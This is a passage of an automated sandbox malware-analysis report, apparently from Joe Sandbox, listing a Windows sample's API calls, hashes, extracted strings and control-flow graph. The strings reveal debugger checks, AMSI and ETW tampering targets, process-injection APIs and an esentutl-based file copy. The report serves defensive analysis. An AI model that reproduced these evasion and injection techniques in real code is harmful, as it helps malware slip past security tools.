                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                          • Opcode ID: f6cd0555e5ebc94e1a3651e3f49869c1e6d51af12e6169cfd13a2ca374733b29
                                                                                                                                          • Instruction ID: 5da60c8a7642921ffd3f14fe0417ff1a0b49b213c52b7310565aea6a1513d8ec
                                                                                                                                          • Opcode Fuzzy Hash: f6cd0555e5ebc94e1a3651e3f49869c1e6d51af12e6169cfd13a2ca374733b29
                                                                                                                                          • Instruction Fuzzy Hash: E601DF71648B04AEEF21EF61DD3296BBBEDEB49F10B550835F405E3680EF3199008C60
                                                                                                                                          Function 02AAAD98 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAADA9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2242398760-0
                                                                                                                                          • Opcode ID: 63dbec516d5c11326e34e7f512299182b6d9b72938760f98e90687eba65359d1
                                                                                                                                          • Instruction ID: a6c4400fa7d12a5be8884a629221218b35a0111e5b7a44fba6f6704e5c5565b6
                                                                                                                                          • Opcode Fuzzy Hash: 63dbec516d5c11326e34e7f512299182b6d9b72938760f98e90687eba65359d1
                                                                                                                                          • Instruction Fuzzy Hash: C9C08CA375222057DA2067F82CD8AC387DDCD4A1F730408A2FA48E3103DF258C50E2E0
                                                                                                                                          Function 02AAF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • InetIsOffline.URL(00000000,00000000,02ABB784,?,?,?,00000000,00000000), ref: 02AAF801
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                            • Part of subcall function 02AAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02AAFAEB,UacInitialize,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize), ref: 02AAF6EE
                                                                                                                                            • Part of subcall function 02AAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02AAF700
                                                                                                                                            • Part of subcall function 02AAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02AAF754
                                                                                                                                            • Part of subcall function 02AAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02AAF766
                                                                                                                                            • Part of subcall function 02AAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02AAF77D
                                                                                                                                            • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
                                                                                                                                            • Part of subcall function 02A9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C0B8B8,?,02AB0751,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession), ref: 02A9C37B
                                                                                                                                            • Part of subcall function 02AADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDAB
                                                                                                                                            • Part of subcall function 02AADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDDB
                                                                                                                                            • Part of subcall function 02AADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02AADDF0
                                                                                                                                            • Part of subcall function 02AADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02AADE1C
                                                                                                                                            • Part of subcall function 02AADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02AADE25
                                                                                                                                            • Part of subcall function 02A97E80: GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,Initialize), ref: 02A97E8B
                                                                                                                                            • Part of subcall function 02A98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02AB370D,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8), ref: 02A98055
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                          • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                          • API String ID: 297057983-2644593349
                                                                                                                                          • Opcode ID: 1da6d27bbf690cada370ee3d7271cc77b4cb469e8686ccbdbcf4ac6481adb55c
                                                                                                                                          • Instruction ID: 27198bc3699c56301c52e75fc529a85c42d1e6d2ce73bc992d4aaff11bc3d6aa
                                                                                                                                          • Opcode Fuzzy Hash: 1da6d27bbf690cada370ee3d7271cc77b4cb469e8686ccbdbcf4ac6481adb55c
                                                                                                                                          • Instruction Fuzzy Hash: 67141975A8411CDFDF21EB65DE90ACA73FABF89304F5044E29409AB614DE30AE92CF51
                                                                                                                                          Function 02AB3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 6965 2ab3e12-2ab5525 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a949a0 call 2a93244 call 2aae678 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa7c10 call 2aa894c call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa7c10 call 2aa894c call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c call 2aa88b8 call 2aaf094 call 2a947ec call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94d74 call 2aadc04 call 2a94d74 call 2aadc04 call 2a94d74 7650 2ab5530-2ab5d82 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae398 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97acc call 2aaf16c call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2aaf108 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 6965->7650 7651 2ab552b call 2aadc04 6965->7651 7894 2ab7568-2ab77e3 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 7650->7894 7895 2ab5d88-2ab5dcd call 2a94860 call 2a949a0 call 2a946d4 call 2a97e5c 7650->7895 7651->7650 8040 2ab77e9-2ab7e3b call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 call 2aaadf8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 7894->8040 8041 2ab8318-2ab8517 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 7894->8041 7895->7894 7913 2ab5dd3-2ab66e5 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 7895->7913 8874 2ab66eb-2ab6944 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a94d74 call 2a94de0 call 2a94764 call 2aadc8c 7913->8874 8875 2ab6949-2ab706c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a93700 7913->8875 8807 2ab7e3d-2ab7e40 8040->8807 8808 2ab7e42-2ab8120 call 2aa5aec call 2a94bcc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa7e50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aab118 call 2a93700 8040->8808 8219 2ab851d-2ab86f0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2a94d74 call 2a94df0 CreateProcessAsUserW 8041->8219 8220 2ab93a1-2ab9524 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 8041->8220 8427 2ab876e-2ab8879 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8219->8427 8428 2ab86f2-2ab8769 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8219->8428 8399 2ab952a-2ab9539 call 2a948ec 8220->8399 8400 2ab9cf5-2abb2fa call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 